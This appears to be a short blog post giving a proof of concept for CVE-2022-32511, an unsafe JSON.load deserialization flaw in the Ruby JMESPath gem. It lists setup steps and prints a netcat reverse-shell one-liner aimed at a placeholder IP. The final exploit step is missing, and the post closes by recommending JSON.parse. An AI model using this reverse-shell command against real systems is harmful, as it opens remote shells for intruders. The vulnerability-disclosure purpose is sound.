809 reads

Here’s a Proof-Of-Concept for CVE-2022–32511 to Gain Remote Code Execution

by Dhanesh DodiaJuly 25th, 2022

Too Long; Didn't Read

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of `JSON.load` which is considered unsafe when used with untrusted input. In order to reproduce the steps, we first require to install ‘JMESPath 1.6.0’ or before: Jmespath. Pick the desired payload, I have picked one from [pentestmonkey.net/cheat-sheet/shells/reverse-shells.

featured image - Here’s a Proof-Of-Concept for CVE-2022–32511 to Gain Remote Code Execution

Description

Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load, which is considered unsafe when used with untrusted input.

Proof-of-concept

In order to reproduce the steps we first require to install ‘JMESPath 1.6.0’ or before:

2. To import the library fire ‘Interactive Ruby Shell’ with the following mentioned command:

irb

3. In case you don’t have ‘irb’ installed then use the following command to download the same:

gem install IRB

4. Pick the desired payload, I have picked one from pentestmonkey:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f

5. Finally, import the vulnerable ‘JMESPath’ library and supply the payload to execute the reverse shell:

Conclusion

It is recommended to use JSON.parse instead of JSON.load . In this case, we observed that the JSON.load has failed to validate the input data which leads to Remote Code Execution.